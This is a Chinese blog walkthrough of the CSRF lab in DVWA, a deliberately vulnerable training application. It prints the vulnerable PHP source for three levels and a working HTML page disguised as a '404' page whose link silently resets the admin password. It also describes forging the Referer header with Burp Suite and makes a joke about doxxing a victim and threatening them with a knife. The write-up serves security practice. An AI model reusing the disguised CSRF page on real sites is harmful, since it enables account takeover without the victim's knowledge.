DVWA-CSRF详解

最新推荐文章于 2025-05-30 09:35:59 发布
原创 最新推荐文章于 2025-05-30 09:35:59 发布 · 987 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

0x01 级别low

1.源码

CSRF Source
<?php 
                 
    if (isset($_GET['Change'])) { 
     
        // Turn requests into variables 
        $pass_new = $_GET['password_new']; 
        $pass_conf = $_GET['password_conf']; 


        if (($pass_new == $pass_conf)){ 
            $pass_new = mysql_real_escape_string($pass_new); 
            $pass_new = md5($pass_new); 

            $insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
            $result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' ); 
                         
            echo "<pre> Password Changed </pre>";         
            mysql_close(); 
        } 
     
        else{         
            echo "<pre> Passwords did not match. </pre>";             
        } 

    } 
?>

2.实现CSRF过程:

  1. 登录DVWA并且设置安全级别为low
  2. 随意输入密码提交并记录url
  3. 根据修改密码构建CSRF代码
  4. <!DOCTYPE html>
<html lang="">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <script LANGUAGE="javascript">
        function adClick(ad, site) {
            window.open(ad, '_self');
            window.location = site
        }
    </script>
</head>

<body>
    <h1>404</h1> <a onclick="javascript:adClick('http://192.168.255.128/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#', 'http://192.168.255.128/dvwa/');" href="#"> 返回</a> </body>

</html>

     

  5. 打开构造的CSRF的html文档 并点击返回
  6. 验证 回到登录页面 发现使用修改的密码能够登陆

 

0x02 级别medium

1.源码

CSRF Source
<?php 
             
    if (isset($_GET['Change'])) { 
     
        // Checks the http referer header 
        if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){ 
     
            // Turn requests into variables 
            $pass_new = $_GET['password_new']; 
            $pass_conf = $_GET['password_conf']; 

            if ($pass_new == $pass_conf){ 
                $pass_new = mysql_real_escape_string($pass_new); 
                $pass_new = md5($pass_new); 

                $insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
                $result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' ); 
                         
                echo "<pre> Password Changed </pre>";         
                mysql_close(); 
            } 
     
            else{         
                echo "<pre> Passwords did not match. </pre>";             
            }     

        } 
         
    } 
?>

2.使用burpsuite快速验证

  1. 打开浏览器设置代理
  2. 打开burpsuite设置拦截
  3. 随意提交密码 后在burpsuite查看
  5. 修改referer头的ip地址为 127.0.0.1
  6. 如果你查看自己的源码是自动获取而不是127.0.0.1就改为你原本的ip
  7. 右键 利用burpsuite快速构建CSRF POC
  9. 点击Copy 关掉拦截 复制粘粘在浏览器窗口打开
  10. 点击submit request
  11. 之后回到登录页面 用修改过的账号密码进行验证 成功

0x03 级别high

1.源代码

CSRF Source
<?php 
             
    if (isset($_GET['Change'])) { 
     
        // Turn requests into variables 
        $pass_curr = $_GET['password_current']; 
        $pass_new = $_GET['password_new']; 
        $pass_conf = $_GET['password_conf']; 

        // Sanitise current password input 
        $pass_curr = stripslashes( $pass_curr ); 
        $pass_curr = mysql_real_escape_string( $pass_curr ); 
        $pass_curr = md5( $pass_curr ); 
         
        // Check that the current password is correct 
        $qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';"; 
        $result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' ); 

        if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){ 
            $pass_new = mysql_real_escape_string($pass_new); 
            $pass_new = md5($pass_new); 

            $insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';"; 
            $result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' ); 
                         
            echo "<pre> Password Changed </pre>";         
            mysql_close(); 
        } 
     
        else{         
            echo "<pre> Passwords did not match or current password incorrect. </pre>";             
        } 

    } 
?>

 2.利用过程:

开个玩笑 ,这个级别确实除了暴力破解找到密码没啥别的办法。 

  1. 通过账号人肉对方
  2. 找到他 刀架在他脖子上 问他原来密码
  3. 利用密码成功修改密码
  4. 被抓

0x04 结语

这个DVWA-CSRF简单的比较简单,难得又很难,所以这篇文章只是作为参考。谢谢

nex1less
关注
DVWA-CSRF
STTTM的博客
12-18 1142
LOW等级: 首先进行正常操作。 接下来打开burpsuit抓包 如图所示,将password参数test改为password: 退出DVWA用刚刚修改的密码成功登陆: 由此可知,这个数据包发送给其他用户,只要该用户登陆了DVWA的网站,就能修改他们的密码,攻击者只要修改password_new和password_conf这两个参数为自己想要的密码,将新的get请求的...
DVWA--CSRF详解
洋洋的小黑屋
01-04 2354
CSRF概念: CSRF跨站请求伪造,黑客诱导用户点击带有伪造请求(修改密码,转账,删除文章等高风险操作请求)链接后,利用未失效的用户认证信息,产生服务器验证请求通过,导致用户在不知名的情况下进行了转账等操作。 与XSS的区别: XSS是通过修改页面Javascript等代码后,发给用户从而实现盗取cookie信息,之后利用cookie进行登陆网站等操作。非法操作是黑客。 CSRF并没有盗取coo...
dvwa csrf
一个安全研究员
05-17 679
科普 csrf就是江湖中的借刀杀人,这里的刀就是用户的cookie,例如:当一个用户登陆了某个系统时,该用户就持有了这个系统分发给他的会话,然后csrf这个漏洞就是我们可以利用这个会话来伪造请求。具体的利用方法,我将通过dvwa中的实例来讲解。 low 虽然我们的dvwa中比起真实的环境差了太多,但是我们可以假设我们现在处于一个真实的环境中,我们打开csrf页面,可以看到是一个改密的页面: ...
dvwa3——CSRF
最新发布
2403_88102829的博客
05-30 1658
先尝试change一组密码:123456修改成功,我们观察上面的url代码将password_new部分与password_conf部分改成我们想要的密码:4321新建一个页面打开,发现密码修改成功。
DVWA CSRF
m0_73606240的博客
01-13 290
DVWA CSRF
dvwaCSRF
Alsn86的博客
02-05 443
dvwaCSRF 是一个修改密码的功能 把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change CSRF之low等级 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G
DVWA靶场通关----(三)CSRF
m0_74977101的博客
02-04 904
攻击者诱骗用户浏览器向目标网站发送一个“伪造的请求”(如转账、修改密码),利用用户已登录的会话权限完成恶意操作。
DVWA-master.zip
01-05
**DVWA靶场详解** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,旨在为网络安全专业人士提供一个平台来练习和学习各种Web应用漏洞。这个靶场包含了多个级别的安全漏洞,从低到高,让使用者...
DVWA 靶场CSRF通关
m0_65761158的博客
07-10 829
添加了一个generateSessionToken()函数,用户每次访问修改密码时服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码。修改密码abc123之后就会在地址栏出现相应的链接可以发现是get型所以提交的参数会所以显示,并提示密码修改成功。可以看到密码已修改成功。
DVWACSRF
weixin_42075643的博客
02-20 819
CSRF:跨站点请求伪造(Cross—Site Request Forgery) 也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种冒充合法用户在当前登录或登录过的且登录信息尚未过期的Web浏览器或者应用程序上执行恶意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 漏洞原理: 合法路人甲登录网站A,登录成功后,服务器返回一个存有用户登录信息的coo.
DVWACSRF
RexHa的博客
09-30 8921
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA-csrf
告白的博客
07-28 502
0x00 漏洞介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。 用户登录、浏览并信任正规网站WebA,同时,WebA通过用户的验证并在用户的浏览器中产生Cookie。 简单理解:将即将支付网址连接盗取,将伪造站点操作代码放在csrf伪造站点,当点击伪造站点自动
dvwa-csrf
Alter__的博客
04-23 455
(元素可提供有关页面的元信息,比如针对搜索引擎和更新频度的描述和关键词) (关联css文件) (role充当什么角色nav?)
dvwa靶场csrf漏洞详解
03-30
</think>### DVWA靶场中CSRF漏洞详解 #### 一、漏洞详解 CSRF(跨站请求伪造)攻击利用用户已登录的会话状态,诱导用户执行非预期的操作[^4]。在DVWA靶场中,攻击者通过构造恶意请求,诱使用户在已认证的浏览器中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值